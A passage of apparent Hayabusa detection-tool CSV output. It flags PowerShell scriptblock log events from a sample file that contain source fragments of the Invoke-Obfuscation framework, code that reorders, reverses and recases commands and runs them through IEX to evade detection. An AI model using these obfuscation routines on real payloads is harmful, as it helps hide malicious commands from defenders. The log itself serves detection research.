'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.249 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.250 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + 